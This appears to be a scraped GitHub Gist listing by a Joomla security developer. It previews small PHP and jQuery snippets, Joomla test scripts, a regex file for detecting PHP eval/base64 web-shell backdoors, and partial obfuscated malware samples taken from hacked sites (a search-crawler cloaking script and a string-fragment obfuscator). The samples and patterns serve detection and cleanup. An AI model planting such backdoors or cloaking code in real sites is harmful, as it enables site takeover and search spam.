Phil Taylor PhilETaylor

View content
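// Normalise $json->version: anything that is not a string (missing, null, number, array, ...) becomes ''.
// isset() stands in for the @ operator, which would also have silenced unrelated
// notices or errors raised while the property is read.
// NOTE(review): assumes $json is a plain data object (e.g. the result of json_decode) — confirm against the caller.
if (!isset($json->version) || !is_string($json->version)) {
    $json->version = '';
}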
View removebtn
<script>
// When the DOM is ready, wire up #submitBtn so that a click removes the
// button element itself from the page.
jQuery(function ($) {
    $('#submitBtn').on('click', function () {
        $(this).remove();
    });
});
</script>
PhilETaylor / match.regex
Last active Aug 29, 2015
Regexes For Perfect Removal
<\?php\s*eval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>|<\?php\s*\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>
<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\
PhilETaylor / time.php
Created Feb 28, 2015
Check Server Time
<?php
/**
* @package Blue Flame Network (bfNetwork)
* @copyright Copyright (C) 2011, 2012, 2013, 2014, 2015 Blue Flame IT Ltd. All rights reserved.
* @license GNU General Public License version 3 or later
* @link http://myJoomla.com/
* @author Phil Taylor / Blue Flame IT Ltd.
*
* bfNetwork is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
View test.php
<?php
// Stand-alone test script that boots Joomla from the directory this file sits in.
// _JEXEC is the marker constant Joomla's own files check for before they agree to run.
define('_JEXEC', 1);
// Use this file's directory as the base path for the includes below.
define('JPATH_BASE', __DIR__);
// includes/defines.php — presumably the site's path constants; its content is not shown here.
require_once JPATH_BASE . '/includes/defines.php';
// Report every error and print it into the response, so failures while the framework loads are visible.
// Displayed errors expose file paths and internals to anyone who requests this script:
// use it on a throwaway copy only and delete the file when the test is done.
error_reporting(E_ALL);
ini_set('display_errors', 1);
require_once JPATH_BASE . '/includes/framework.php';
PhilETaylor / 6556.php
Last active Aug 29, 2015
Test case for issue 6556
<?php
// place this file in root of Joomla 3.4.1 Site
// A script in the site root can be requested by anyone who can reach the site;
// remove it again once the test case has been run.
// Bootstrap
// _JEXEC is the marker constant Joomla's own files check for before they agree to run.
define('_JEXEC', 1);
// Use this file's directory as the base path for the includes below.
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
require_once JPATH_BASE . '/includes/framework.php';
// Ask the Joomla factory for the front-end ('site') application object.
$app = JFactory::getApplication('site');
View hack.php
<?
// NOTE(review): published as hack.php; it reads like obfuscated code taken from a compromised site.
// The preview stops inside the try block, so only the visible set-up is described here.
// The short open tag means the file executes only where short_open_tag is enabled.
//
// Obfuscation layer: ${"GLOBALS"}["key"] is just $GLOBALS["key"]. These lines create globals with
// random names whose VALUES are the names of the variables actually used (credit, ctx, b_t).
// For detection: the ${"GLOBALS"}[" spelling with random keys is unusual in hand-written code.
${"GLOBALS"}["rccbcjbve"] = "credit";
${"GLOBALS"}["ecgmatfzch"] = "ctx";
${"GLOBALS"}["gbmjnqnelon"] = "b_t";
// The body is skipped when a constant named CREDIT already exists.
if (!defined("CREDIT")) {
${"GLOBALS"}["iqygiudjlzx"] = "b_t";
// ${${"GLOBALS"}["gbmjnqnelon"]} resolves to $b_t.
// $b_t = "1" when the lower-cased User-Agent contains "googlebot", otherwise "0".
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "googlebot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "1" : ${${"GLOBALS"}["gbmjnqnelon"]} = "0";
// $b_t = "2" when the User-Agent contains "bingbot"; otherwise $b_t is assigned to itself and keeps its value.
// NOTE(review): the flag singles out search-engine crawlers; how it is used is outside the preview.
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "bingbot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "2" : ${${"GLOBALS"}["iqygiudjlzx"]} = ${${"GLOBALS"}["gbmjnqnelon"]};
// $ctx = a stream context whose http wrapper option "timeout" is 3.
// NOTE(review): such a context is normally handed to a URL read; that call is not visible here.
${${"GLOBALS"}["ecgmatfzch"]} = stream_context_create(array("http" => array("timeout" => 3)));
try {
PhilETaylor / rvqqwmas.php
Created May 5, 2015
hacked example May 2015
<?php
// NOTE(review): published as "hacked example May 2015". Every visible statement only stores a short
// string fragment in a randomly named variable; none of the variables is read in this preview.
// The fragments hold pieces of PHP punctuation ('$', '(', '[', '"', ')', ...), which suggests they are
// joined into code further down — the rest of the file is not shown, so confirm against the full sample.
$burk = 'it]]$e_$r'; $fiance ='tykei6';$incoherent = 'ah[';$descry='c';$fucku = 'W$])ONWdT'; $betta= 'Iw';$drip='HT(na';$expendable= ')'; $darda= 'e';$capturers='d';$lettered='g'; $clarabelle='e';$bait = 'rto"ecvm';
$alverta ='o';
$lolly ='da`ic?g_';
$biscuit= '?'; $bondsman= 'O(=SL';$breastworks= 'RTsb,_lf';$hocus= 'U(["Q';
$interruption= 'Er'; $boxers='""ET['; $evaleen='T';
View gist:d6314c46dd44fabd5479
Return-Path: <agent@ukrs394972.pur3.net>
Delivered-To: phil@phil-taylor.com
Received: from smtp39.gate.ord1a (smtp39.gate.ord1a.rsapps.net [10.130.4.39])
by store127a.mail.ord1a (SMTP Server) with ESMTP id 42DB280001
for <phil@phil-taylor.com>; Fri, 22 May 2015 07:28:07 -0400 (EDT)
Received: from [172.20.100.8] ([172.20.100.8:41554] helo=smtp8.gate.dfw1a)
by smtp39.gate.ord1a.rsapps.net (envelope-from <agent@ukrs394972.pur3.net>)
(ecelerity 2.2.3.49 r(42060/42061)) with ESMTPS (cipher=AES256-SHA)
id A3/A8-14118-7C21F555; Fri, 22 May 2015 07:28:07 -0400
X-Spam-Threshold: 95